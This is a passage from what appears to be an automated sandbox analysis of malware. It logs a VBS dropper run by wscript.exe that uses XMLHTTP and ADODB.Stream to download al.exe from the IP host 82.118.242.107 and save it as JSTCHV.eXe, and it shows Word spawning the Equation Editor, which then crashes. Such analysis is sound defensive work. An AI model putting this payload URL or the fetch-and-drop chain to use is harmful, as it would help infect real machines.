|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7624a79d |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = ShellExecuteExW, address_out = 0x76b21e46 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-27 09:37:04 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 136812 |
|
1 |
Environment (16)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
5 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client;C:\Program Files\Microsoft Office\root\Client |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Windows\System32 |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\AppData\Local\Temp |
|
1 |
Process #8: wscript.exe
91
6
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\syswow64\wscript.exe |
| Command Line | "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\ZMXZAA.vBS" |
| Initial Working Directory | C:\Users\aETAdzjz\AppData\Local\Temp\ |
| Monitor | Start Time: 00:01:19, Reason: Child Process |
| Unmonitor | End Time: 00:01:37, Reason: Self Terminated |
| Monitor Duration | 00:00:18 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x5a8 |
| Parent PID | 0x488 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
6E4
0x
410
0x
8E4
0x
594
0x
8A4
0x
8FC
0x
89C
0x
8A0
0x
920
0x
980
0x
900
0x
64
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00031fff | Pagefile Backed Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00060fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x000affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x000b0fff | Private Memory | rw |
|
|
|
- |
| wscript.exe | 0x000c0000 | 0x000cefff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001f0000 | 0x00256fff | Memory Mapped File | r |
|
|
|
- |
| zmxzaa.vbs | 0x00260000 | 0x00260fff | Memory Mapped File | r |
|
|
|
- |
| rsaenh.dll | 0x00260000 | 0x0029bfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| zmxzaa.vbs | 0x00270000 | 0x00270fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0029ffff | Private Memory | rw |
|
|
|
- |
| msxml3r.dll | 0x00270000 | 0x00270fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000280000 | 0x00280000 | 0x00281fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0029ffff | Private Memory | rw |
|
|
|
- |
| msxml3.dll | 0x002a0000 | 0x002c7fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000350000 | 0x00350000 | 0x0042efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000430000 | 0x00430000 | 0x0052ffff | Private Memory | rw |
|
|
|
- |
| windowsshell.manifest | 0x00530000 | 0x00530fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000530000 | 0x00530000 | 0x00530fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x00541fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x00550000 | 0x0055bfff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x00560000 | 0x00567fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x005affff | Private Memory | rw |
|
|
|
- |
| index.dat | 0x005b0000 | 0x005bffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005c0000 | 0x005c0000 | 0x005c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x0062ffff | Private Memory | - |
|
|
|
- |
| wscript.exe | 0x00630000 | 0x00655fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000660000 | 0x00660000 | 0x007e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000830000 | 0x00830000 | 0x0083ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x009c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009d0000 | 0x009d0000 | 0x01dcffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001dd0000 | 0x01dd0000 | 0x02112fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002120000 | 0x02120000 | 0x0225ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002140000 | 0x02140000 | 0x0217ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002180000 | 0x02180000 | 0x021cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000021d0000 | 0x021d0000 | 0x0220ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002220000 | 0x02220000 | 0x0225ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002260000 | 0x02260000 | 0x022effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002260000 | 0x02260000 | 0x0229ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000022b0000 | 0x022b0000 | 0x022effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002300000 | 0x02300000 | 0x0233ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002340000 | 0x02340000 | 0x023affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023b0000 | 0x023b0000 | 0x024affff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x024b0000 | 0x0277efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002780000 | 0x02780000 | 0x027fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002800000 | 0x02800000 | 0x028fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002900000 | 0x02900000 | 0x029fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002a00000 | 0x02a00000 | 0x02dfffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002e00000 | 0x02e00000 | 0x02efffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f40000 | 0x02f40000 | 0x0303ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003040000 | 0x03040000 | 0x0316ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x03040000 | 0x030fffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000003130000 | 0x03130000 | 0x0316ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003170000 | 0x03170000 | 0x0335ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003170000 | 0x03170000 | 0x0328ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003320000 | 0x03320000 | 0x0335ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003360000 | 0x03360000 | 0x0375ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000037a0000 | 0x037a0000 | 0x0389ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000038a0000 | 0x038a0000 | 0x0399ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000039e0000 | 0x039e0000 | 0x03a1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003a40000 | 0x03a40000 | 0x03b3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003b40000 | 0x03b40000 | 0x03cdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003b40000 | 0x03b40000 | 0x03c4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003ca0000 | 0x03ca0000 | 0x03cdffff | Private Memory | rw |
|
|
|
- |
| msxml3.dll | 0x74490000 | 0x745c2fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74960000 | 0x74afdfff | Memory Mapped File | rwx |
|
|
|
- |
| scrrun.dll | 0x74b00000 | 0x74b29fff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x74b30000 | 0x74b41fff | Memory Mapped File | rwx |
|
|
|
- |
| wshom.ocx | 0x74b50000 | 0x74b70fff | Memory Mapped File | rwx |
|
|
|
- |
| scrobj.dll | 0x74b80000 | 0x74bacfff | Memory Mapped File | rwx |
|
|
|
- |
| rtutils.dll | 0x74c50000 | 0x74c5cfff | Memory Mapped File | rwx |
|
|
|
- |
| rasman.dll | 0x74c60000 | 0x74c74fff | Memory Mapped File | rwx |
|
|
|
- |
| rasapi32.dll | 0x74c80000 | 0x74cd1fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x74ce0000 | 0x74cfbfff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x74d00000 | 0x74d43fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x74f80000 | 0x74f86fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74f90000 | 0x74f98fff | Memory Mapped File | rwx |
|
|
|
- |
| wshext.dll | 0x74fa0000 | 0x74fb5fff | Memory Mapped File | rwx |
|
|
|
- |
| msisip.dll | 0x74fc0000 | 0x74fc7fff | Memory Mapped File | rwx |
|
|
|
- |
| vbscript.dll | 0x74fd0000 | 0x7503afff | Memory Mapped File | rwx |
|
|
|
- |
| sxs.dll | 0x75040000 | 0x7509efff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x750a0000 | 0x750dafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x750e0000 | 0x750f5fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x75100000 | 0x75183fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x751f0000 | 0x75202fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75210000 | 0x7528ffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75350000 | 0x7535dfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75950000 | 0x7595afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75ac0000 | 0x75bf5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x75cc0000 | 0x75cecfff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76040000 | 0x760c2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76330000 | 0x7644cfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x76450000 | 0x76484fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76720000 | 0x767aefff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x767e0000 | 0x769dafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76b00000 | 0x77749fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x77800000 | 0x7780bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77920000 | 0x77a14fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x77df0000 | 0x77df5fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efa1000 | 0x7efa1000 | 0x7efa3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
|
For performance reasons, the remaining 59 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
COM (7)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | B54F3741-5B07-11CF-A4B0-00AA004A55E8 | 00000000-0000-0000-C000-000000000046 | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Create | 6C736DB1-BD94-11D0-8A23-00AA00B58E10 | 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 06290BD1-48AA-11D2-8432-006008C3FBFC | E4D1C9B0-46E8-11D4-A2A6-00104BD35090 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | wscript.shell | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Create | MSXML2.XMLHTTP | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Create | ADODB.Stream | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Execute | MSXML2.XMLHTTP | IDispatch | method_name = Open |
|
1 |
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\ZMXZAA.vBS | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | JSTCHV.eXe | - |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\ZMXZAA.vBS | type = size |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\ZMXZAA.vBS | type = size |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Temp\ZMXZAA.vBS | size = 1470, size_out = 1470 |
|
1 | |
| Write | JSTCHV.eXe | size = 647432 |
|
1 |
Registry (27)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\.vBS | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\VBSFile\ScriptEngine | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = IgnoreUserSettings, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = Enabled, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = Enabled, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = IgnoreUserSettings, data = 3, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = LogSecuritySuccesses, data = 3, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = LogSecuritySuccesses, data = 3, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = IgnoreUserSettings, data = 205, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = TrustPolicy, data = 143, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = UseWINSAFER, data = 205, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = TrustPolicy, data = 143, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = UseWINSAFER, data = 1, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = Timeout, data = 192, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = DisplayLogo, data = 1, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = Timeout, data = 192, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = DisplayLogo, data = 49, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\.vBS | data = VBSFile, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\VBSFile\ScriptEngine | data = VBScript, type = REG_SZ |
|
1 |
Module (19)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x76220000 |
|
1 | |
| Load | ole32.dll | base_address = 0x75cf0000 |
|
1 | |
| Load | C:\Windows\system32\advapi32.dll | base_address = 0x76490000 |
|
1 | |
| Get Handle | c:\windows\syswow64\wscript.exe | base_address = 0x630000 |
|
3 | |
| Get Handle | c:\windows\syswow64\ole32.dll | base_address = 0x75cf0000 |
|
1 | |
| Get Filename | c:\windows\syswow64\wscript.exe | process_name = c:\windows\syswow64\wscript.exe, file_name_orig = C:\Windows\SysWOW64\WScript.exe, size = 261 |
|
1 | |
| Get Filename | - | process_name = c:\windows\syswow64\wscript.exe, file_name_orig = C:\Windows\SysWOW64\WScript.exe, size = 261 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSetInformation, address_out = 0x76235651 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoCreateInstance, address_out = 0x75d39d0b |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SaferIdentifyLevel, address_out = 0x764b2102 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SaferComputeTokenFromLevel, address_out = 0x764b3352 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SaferCloseLevel, address_out = 0x764b3825 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CLSIDFromProgIDEx, address_out = 0x75d00782 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoGetClassObject, address_out = 0x75d254ad |
|
1 | |
| Get Address | c:\windows\syswow64\wscript.exe | function = 1, address_out = 0x632bb9 |
|
1 | |
| Create Mapping | C:\Users\aETAdzjz\AppData\Local\Temp\ZMXZAA.vBS | filename = C:\Users\aETAdzjz\AppData\Local\Temp\ZMXZAA.vBS, protection = PAGE_READONLY, maximum_size = 1470 |
|
1 | |
| Map | C:\Users\aETAdzjz\AppData\Local\Temp\ZMXZAA.vBS | process_name = c:\windows\syswow64\wscript.exe, desired_access = FILE_MAP_READ |
|
1 |
Window (3)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = WSH-Timer, wndproc_parameter = 8594896 |
|
1 | |
| Create | - | - |
|
1 | |
| Set Attribute | - | class_name = WSH-Timer, index = 18446744073709551595, new_long = 8594896 |
|
1 |
System (15)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = -1 (infinite) |
|
3 | |
| Get Time | type = System Time, time = 2018-11-27 09:37:06 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 138341 |
|
1 | |
| Get Time | type = Ticks, time = 138419 |
|
1 | |
| Get Info | type = Operating System |
|
5 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = System Directory |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Network Behavior
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 339 bytes |
| Total Data Received | 632.26 KB |
| Contacted Host Count | 1 |
| Contacted Hosts | 82.118.242.107 |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729) |
| Server Name | 82.118.242.107 |
| Server Port | 80 |
| Data Sent | 339 |
| Data Received | 647432 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = 82.118.242.107, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /~able/1_ga/al/al.exe |
|
1 | |
| Send HTTP Request | url = http://82.118.242.107/~able/1_ga/al/al.exe |
|
1 | |
| Receive HTTP Status | status = 200 |
|
1 | |
| Read Response | size_out = 647432 |
|
1 |
Process #9: eqnedt32.exe
0
0
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\equation\eqnedt32.exe |
| Command Line | "C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding |
| Initial Working Directory | C:\Program Files\Microsoft Office\Root\Office16\ |
| Monitor | Start Time: 00:01:20, Reason: Child Process |
| Unmonitor | End Time: 00:01:28, Reason: Crashed |
| Monitor Duration | 00:00:08 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x894 |
| Parent PID | 0x8ec (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
898
0x
874
0x
870
0x
5B4
0x
9A0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
